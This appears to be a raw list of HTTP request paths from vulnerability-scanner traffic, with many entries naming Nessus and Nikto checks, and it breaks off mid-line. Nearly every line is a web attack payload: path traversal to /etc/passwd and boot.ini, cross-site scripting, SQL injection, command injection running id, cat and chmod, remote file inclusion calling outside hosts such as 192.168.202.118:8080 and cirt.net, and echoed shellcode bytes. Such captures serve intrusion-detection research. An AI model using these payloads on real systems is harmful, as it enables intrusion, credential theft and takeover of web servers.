/etc/passwd\n/<script>document.cookie=\"testjvvf=7721;\"</script>\n/recordings/showcat.php?cat=1'\n/main.php?stuff=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/examples/jsp/jsp2/jspx/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/modules.php?file=index&id=aaw&include=../../../../../../../../../etc/passwd&name=gallery&op=modload&set_albumname=album01\n/scgi-bin/.passwd\n/scripts/vvh_tajyleqq.cfm\n/examples/jsp/sessions/viewcvs.cgi/?cvsroot=<script>foo</script>\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls\n/j4oqyvga.cgi?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/main.php?stuff=\"&rm\\xa0q78321413&rem\\xa0\n/scripts/op/op.login.php?login=guest&sesstheme=default&lang=english\n/main.php?stuff=\"del q55141299 #\n/main.php?logout=\"&del\\x0cq99238383&rem\\x0c\n/javascript/salesforce.exe\n/phpmyadmin/documentation.html?phpmyadmin=`cat /etc/passwd`\n/..\\xc0\\xaf/phpmyadmin/setup/?d=a\n/?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/cal/survey.inc.php?path=/etc/passwd\\x00\n/9o6g5vkn.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/recordings/index.php\n/scripts/directory.php?dir=;cat /etc/passwd\n/main.php?stuff=\"rm,q26668686&rem,\n/fo564rei.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qczkquis.php?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/help.php?q=\"\\x0ddel q75726259 #\n/examples/servlets/servlet/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/myactionscript/\n/examples/jsp/jsp2/el/notify?from=nessus\"|id\"\n/../.zip\n/examples/servlets/servlet/webplus?script=/../../../../etc/passwd\n/javascript/me.exe\n/cacti/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/top.php?stuff=\"&rm q85227619&rem \n/u8yiqilu.html?<script>document.cookie=\"testswjp=6010;\"</script>\n/edv3mapy.nsf?<script>cross_site_scripting.nasl</script>\n/cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>\n/examples/jsp/jsp2/jspx/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?logout=\"&ver\\x0b>q42433487&rem\\x0b\n/top.php?stuff=\"del\\x0bq25747246&rem\\x0b\n/examples/jsp/colors/save.php?file_save=/etc/passwd\n<script>document.cookie=\"testpokn=7494;\"</script>\n/main.php?stuff='rm\\x09q81291893\\x09#\n/l4fz1dqw.do?<script>cross_site_scripting.nasl</script>\n/scripts/vjdqbbls.exe\n/v3axg1p8.fts?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/azcrfs8d.exe?<script>document.cookie=\"testjpdr=9205;\"</script>\n/subscriptions.svn-base\n/help.php?q=\"&del\\x09q57946156\\x09#\n/top.php?stuff=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/scripts/rvckwz6smkqf.shtml\n/scripts/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/recordings/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919009','5'--\n/qczkquis.htm?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/servlets/servlet/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/examples/jsp/error/sources/functions.php?root_path=/etc/passwd\\x00\n/top.php?stuff=\";del\\x09q51581738\\x09#\n/lsoix5h3.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-local/r.cgi?file=../../../../../../../../../../etc/passwd\n/g3w7y7u5.fts?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/javascript/htpasswd.ws\n/help.php?q=\"rm\\x09q14739543&rem\\x09\n/examples/jsp/jsp2/jspx/hw3.cgi?daysonly=0).system('id').(\n/phpmyadmin/calendar.php?month=' union select 1,1,'1331923199','calendarix_month_sql_injection.nasl',1 #\n/kai's_supergoo/\n/phpmyadmin/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/top.php%3fstuff%3d1861731255&frm_user=q26491665&scr_height=&scr_width=\n/top.php?stuff=\"rm q61593836&rem \n/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini\n/examples/servlets/servlet/pfdispaly?../../../../../../etc/passwd\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(624246618)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(251808778)</script>\n/examples/jsp/error/kb.cgi?view='&lang=en\n/subscriptcenter/\n/examples/jsp/error/man-cgi?section=0&topic=ls;id\n/help.php?q=rm;q81588837&rem;\n/main.php?logout='&uname #\n/uc3w3bdi.dll?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/nyvbv05h.cfm?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/jsp/error/index.php?template=../../../loudblog/custom/config.php\\x00\n/top.php?stuff=ping;-w;8000;-n;1;1.2.3.4|rem;\n/scripts/4rzefq7dsowk.cfm\n/python_scripts/\n/m5103snj.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\";del q35934398 #\n/main.php?logout=\"del\\x09q95413462&rem\\x09\n/examples/jsp/jsp2/el/webplus.exe?script=webplus_install_path.nasl\n/top.php?stuff=\"&rm\\x0bq26467745&rem\\x0b\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/frznctvhi0i5??\n/cgi-bin/ppdscgi.exe\n/xlj7h65o.cgi?<script>document.cookie=\"testtbbe=856;\"</script>\n/examples/jsp/jsp2/jspx/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/3j8echh0.idc?<script>document.cookie=\"testfuqi=4189;\"</script>\n/help.php?q=\"|ping;-w;11000;-n;1;1.2.3.4|rem;\n/help.php?q=ver;>q42148333&rem;\n/examples/servlets/servlet/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/javascript/procurement.exe\n/main.php?stuff=\"ver,>q47628643&rem,\n/examples/jsp/cal/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/examples/servlets/servlet/core/api.php?t_path_core=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/help.php?q='\\x0auname\\x09>q79344163\\x09#\n/main.php?logout=;sleep 8 #\n/nuh3zirz.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/xml.exe\n/cgi-bin/www/delivery/ac.php?bannerid=-1331908788+or+1=1+--+';passthru(base64_decode($_server[http_nessus_cvzsqn29]));die;/*\n/cgi-local/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/eei78ore.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/mapserv.exe?map=mapserver_detect.nasl.map\n/recordings/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/help.php?q=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/9kr0ih0v.jsp?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/scripts/news.php\n/egaet53a.idc?<script>cross_site_scripting.nasl</script>\n/javascript/addressbook.exe\n/edzaia0i.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.dll?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/num/newsscript.pl?mode=admin\n/help.php?q=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/yef5f3d5.cfm?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/y8pmygrp.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/examples/jsp/colors/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/scripts/php.ini\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/rlfsfoelhy\"\n//q32152879&#x26;q1741&#x22;q1741&#x3c;q1741&#x3e;q32152879\n/iisadmpwd/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/m4kkjf8l.nsf?<script>document.cookie=\"testyglc=8988;\"</script>\n/6qbynt4f.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/scripts/js/scripts.php?load=/etc/passwd\\x00\n/examples/jsp/num/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/hjdzm96v.mscgi?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/qhvu0pdg.x?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/top.php?stuff=\"&sleep 7 #\n/en-us/account/faxsurvey?cat /etc/passwd\n/examples/jsp/colors/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/scripts/info2www\n/modules.php?op=modload&name=dmozgateway&file=index&topic=<script>alert('vulnerable')</script>\n/scripts/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/ows-bin/msmmask.exe?mask=/junk334\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332009306\n/ovlaunch.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+0+>>ctdn\n/examples/jsp/colors/remindpasswd\n/m\\xc9\\x99'lumat_m\\xc9\\x99nb\\xc9\\x99l\\xc9\\x99ri/\n/recordings/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/help.php?q=';del\\x09q61196872\\x09#\n/main.php?logout=\"\\x0asleep\\x099\\x09#\n/script_path/installation/index.php?mosconfig_absolute_path=@rfiurl?mosconfig_absolute_path=@rfiurl?\n/scripts/update.dpgs\n/main.php?stuff=\"ver\\x0c>q36356367&rem\\x0c\n/scripts/lom_update.php?etcdir=http://cirt.net/rfiinc.txt?\n/scripts/index.php?board=nonexistant2017152582\n/kwinoqez.exe/\n/en-us/account/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/script/index.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/pm_buddy_list.asp?name=a&desc=b\"><script>alert('vulnerable')</script><a s=\"&code=1\n/javascript/cfm.exe\n/bmeun223.html?<script>document.cookie=\"testhhwu=7044;\"</script>\n/en-us/ddoworrl.php?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/colors/catalog.php?action=category_show&id='\n/examples/jsp/sessions/index.php?configfile=../../../../../../../../../etc/passwd\n/1r8cfrlf.pl?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/atgoarbcxk0;'); function v\n/s7qus4g3.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs\"; waitfor delay '0:0:4' -- \n/fpnpp5zg.htm?<script>document.cookie=\"testyias=101;\"</script>\n/recordings/index.php?cat_select=<script>foo</script>\n/javascript/network.exe\n/en-us/oie504mr.cgi?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?logout=\";sleep 11 #\n/top.php?stuff=&ver >q16387238&rem \n/cacti/search/show.pl?url=file:/etc/passwd\n/wasdscripts172/\n/ju0u7kfo.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/file.php?path=/etc/passwd\\x00\n/o1zj4u9v.cfm?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/examples/jsp/error/direct.php?rf=/etc/passwd\\x00\n/help.php?q=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/confirmunsubscription.php?output=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/jsp/error/wiki.php/<script>foo</script>\n/qczkquis.aspx?<script>document.cookie=\"testkwlg=5591;\"</script>\n/cgi.cgi/ion-p.exe?page=c:\\winnt\\repair\\sam\n/h5i6crm3.dll?<script>document.cookie=\"testlihk=7070;\"</script>\n/examples/jsp/sessions/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/en-us/account/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/scripts/onwkbtts3uj1.inc\n/bxnyrhmh.mscgi?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/eg2u8pbv.cfc?<script>cross_site_scripting.nasl</script>\n/6qbynt4f.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/calendar.php?month=' union select 1,1,'1331909343','calendarix_month_sql_injection.nasl',1 #\n/help.php?q='&del\\x09q42899831\\x09#\n/examples/jsp/colors/port.php?proto=tcp'\n/en-us/account/shoutbox.php?conf=../\n/cacti/faq.php?action=&type=view&s=&id=-1' union select 0,2083950439,0,0,0,0,0--\n/sitescope/cgi/go.exe/sitescope?page=eventlog&machine=&logname=system&account=administrator\n//.../.../.../.../.../.../.../.../windows/win.ini\n/examples/jsp/error/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/1qwv2p5p.html?<script>document.cookie=\"testvqcy=252;\"</script>\n/scripts/cdjnwtwnqga1.sh\n/javascript/4.exe\n/nsn/..\\web/env.bas\n/scripts/1331909156-ror_session_fixation.nasl\n/ygkjkngd.php?<script>document.cookie=\"testnago=4518;\"</script>\n/ao22ww7y.jspa?<script>document.cookie=\"testqppc=8767;\"</script>\n/dda2qr7j.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/help.php?q=\"&rm\\x09q98836719&rem\\x09\n/scripts/cevvxrxqxc_b.cfm\n/tukodz3j.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/index.php?templates_dir=/etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/gjehhrjnrx0;echo|awstats586722.txt\n/apavxugx.kspx?<script>document.cookie=\"testdnbh=5237;\"</script>\n/main.php?logout='\\x0auname #\n/scripts/index.php?edit=nonexistant2052963446\n/cgi-bin/search.jsp?q=%\"<script>alert(1332008324)</script>\n/j4rdyhw8.cfm?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/zqqemp6j.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.pl?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/top.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/forgotpasswd/\n/scripts/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/top.php?stuff=\"\\x0drm\\x09q29585118\\x09#\n/scripts/sgb_dir/superguestconfig\n/javascript/ietf.exe\n/zroo33l4.kspx?<script>document.cookie=\"testiklc=904;\"</script>\n/scripts/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/scripts/..%5c..%5cwinnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe og5mz8h.exe\n/archive.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/examples/jsp/jsp2/el/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/manager/index.php?id='union/**/select/**/0,0,1512225497,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/top.php?stuff=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/pandascript/\n/top.php?stuff=&ping;-w;9000;-n;1;4.3.2.1&rem;\n/ny1b3qq4.cfm?<script>cross_site_scripting.nasl</script>\n/q703m78q.php?<script>document.cookie=\"testvowq=604;\"</script>\n/main.php?logout='ls'\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='2022599802\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=q31623741&scr_width=\n/main.php?logout=\"ver&rem;\n/main.php?logout=\"\\x0dsleep\\x099\\x09#\n/javascript/health.exe\n/examples/jsp/jsp2/el/sawmillcl.exe?ho+{complete_version}\n/faq.php?action=&type=view&s=&id=-1' union select 0,960542939,0,0,0,0,0--\n/recordings/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/zuihld5m.jspa?<script>cross_site_scripting.nasl</script>\n/g8nu2yy7.aspx?<script>cross_site_scripting.nasl</script>\n/main.php?logout='uname >q29138864 #\n/recordings/snpfiltered.pl?t=c&u=<script>foo</script>\n/?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/scripts/comersus_searchitem.asp\"><script>alert('nessus was here');</script>\n/clk;32000624;7163019;r/\n/examples/jsp/error/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/help.php?q=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/examples/jsp/jsp2/el/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/examples/jsp/num/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/javascript/test123.exe\n/examples/jsp/error/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/subscriptions.pm\n/main.php?logout=\"&rm\\x09q15516267&rem\\x09\n/top.php?stuff=\"del\\x0cq33687847&rem\\x0c\n/en-us/i686v90l.jspa?<script>document.cookie=\"testfutf=1550;\"</script>\n/examples/jsp/sessions/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/manager/pfdispaly?../../../../../../etc/passwd\n/cgi-bin/shopexd.asp?catalogid='42\n/scripts/cdjnwtwnqga1.cfm\n/cgi-sys/htimage.exe/path/filename?2,2\n/examples/servlets/servlet/includes/config.php?relative_script_path=http://xxxxxxx\n/javascript/purchase.exe\n/javascript/imp.exe\n/bxnyrhmh.fts?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n<script>document.cookie=\"testgfbr=7014;\"</script>\n/main.php?logout='&uname\\x09#\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/ipb5ri??\n/o1zj4u9v.idc?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/top.php?stuff=\"del,q67251581&rem,\n/cgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/e9rx3ya4.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/file.php?path=/etc/passwd\\x00\n/examples/jsp/sessions/nslookup.cgi?query=localhost;id&type=any&ns=\n/0w155a7c.do?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?op=default&date=200607' union select 1,609673267,1,1,1,1,1,1,1,1--&blogid=1\n/cacti/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/tyrovghehq.sh').\"]=1\n/examples/jsp/num/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/cacti/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/ap58k3ci.nsf?<script>cross_site_scripting.nasl</script>\n/i2n4v4rl.x?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.kspx?<script>document.cookie=\"testxagh=6987;\"</script>\n/en-us/account/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/en-us/account/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/azcrfs8d.php?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/error/misc/audio.php?recording=../version.inc\n/examples/jsp/jsp2/jspx/perl.exe?-v\n/help.php?q=ver\\x0c>q95146855&rem\\x0c\n/w4996nr0.jsp?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n//q47417758&q6971\"q6971<q6971>q47417758\n/ap58k3ci.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/snpfiltered.pl?t=c&u=<script>foo</script>\n/examples/jsp/num/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/subscriptions.png\n//perl.exe?-v\n/d5a5renl.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/q703m78q.mscgi?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/carisoprodol-prescription/\n/archive.php?scriptpath=http://192.168.202.118:8080/iroy1gvqrrqu??\n<meta http-equiv=set-cookie content=\"testwews=8477\">\n/examples/jsp/jsp2/jspx/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/manager/detail.asp?nchannel='1\n/main.php?stuff=;uname\\x09>q93759833\\x09#\n/scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/en-us/account/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/mv8wxfy9.aspx?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/main.php?logout='&uname\\x09>q59435268\\x09#\n/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/scripts/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/recordings/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ltelnhamax.sh+>+/dev/null+&'); function v\n/examples/jsp/sessions/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi-bin/webplus.exe?about\n/javascript/entries.exe\n/cgi-exe/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/vmi8bb12.fts?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/jujgxwav.htm?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/bbedit_script/\n/9kr0ih0v.fts?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/confirmunsubscription.php?output=http://192.168.202.118:8080/iroy1gvqrrqu?\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.96:8080/txenjrxf3?\n/q703m78q.php3?<script>document.cookie=\"testvowq=604;\"</script>\n/examples/jsp/jsp2/el/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/main.php?logout=\"ping -w 10000 -n 1 4.3.2.1&rem \n/cacti/www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jngdhflg]));die;/*\n/<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/hipkz026.x?<script>document.cookie=\"testyrbs=2855;\"</script>\n/javascript/mp3s.exe\n/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/fo564rei.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/actionscript3pr/\n/uc3w3bdi.html?<script>document.cookie=\"testxllt=9940;\"</script>\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/2aibfaczmac8?\n/scriptwire/\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/colors/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/main.php?logout='|sleep 8 #\n/pxagj7n7.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t7tm4m0b.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='|sleep 7 #\n/raanw4ia.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&rm\\x0bq33773559&rem\\x0b\n/cgi-bin/htimage.exe/path/filenikto?2,2\n/_mem_bin/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/vbulletin_xss/\n/top.php?stuff=\"&rm\\x0bq54461117&rem\\x0b\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+ff+d0+89+44+24+24+5a+93+e8+10+00+00+00+61+5b+ff+e3+60+33+c0+b0+04+e8+16++>>esbq\n/jnt3f86c.php?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/javascript/crashes.exe\n/examples/jsp/sessions/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/bzuf9ozq.dll?<script>cross_site_scripting.nasl</script>\n/cgi-home/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/examples/servlets/servlet/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/examples/jsp/sessions/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/recordings/data/fetch.php?page='\n/6wb70v0b.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.x?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/de3v2dd9.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/u8yiqilu.nsf?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/cacti/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/h5sc3gxy.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/main.php?stuff=\"&rm\\xa0q28776765&rem\\xa0\n/prescription-tramadol/\n/javascript/_mem_bin.exe\n/javascript/cover.exe\n/recordings/wa.exe?debug-show-version\n/scripts/cphost.dll\n/javascript/todo.exe\n/edv3mapy.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/search.jsp?q=%\"<script>alert(1331904374)</script>\n/scripts/ylrvly9nh_pf.pl\n/examples/jsp/jsp2/el/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/subscription_services/\n/examples/jsp/sessions/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/fnwhrxyd.dll?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&uname >q83422114 #\n/cgi.cgi/ion-p?page=../../../../../etc/passwd\n/cgi-bin/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/scripts/bblog/index.php\n/top.php?stuff=\"del\\x09q19771951\\x09#\n/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini\n/cgi-bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/examples/jsp/colors/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://cirt.net/rfiinc.txt??\n/examples/servlets/servlet/ion-p.exe?page=../../../../../etc/passwd\n/path_script/createurl.php?formurl=http://192.168.202.118:8080/ghl9il?\n/fi?/etc/passwd\n/dslpwt15.jsp?<script>document.cookie=\"testtkio=5454;\"</script>\n/examples/jsp/error/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/jdx255ea.cfm?<script>document.cookie=\"testziyq=5055;\"</script>\n/0z575z74.cfc?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/help.php?q='&del\\x09q78257168\\x09#\n/recordings/download.php?language=/etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/top.php?stuff=;del\\x09q51161767\\x09#\n/<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/swgnhpydbq0t?'\n/uvazfs7p.nsf?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/main.php?logout=\"&ver&rem \n/manager/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/examples/jsp/jsp2/el/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/rpxyx07v.pl?<script>document.cookie=\"testbnli=1975;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd\\x00index.html\n/javascript/wp-includes.exe\n/main.php?stuff=\"del\\x09q91227717\\x09#\n/javascript/emails.exe\n/cacti/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/zqqemp6j.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=\n/eg2u8pbv.do?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q26185715&frm_user=&scr_height=&scr_width=\n/scripts/add_url.htm?node=<script>alert('xss')</script>\n/examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/button_freesubscription/\n/8t9v8k7x.cfc?<meta http-equiv=set-cookie 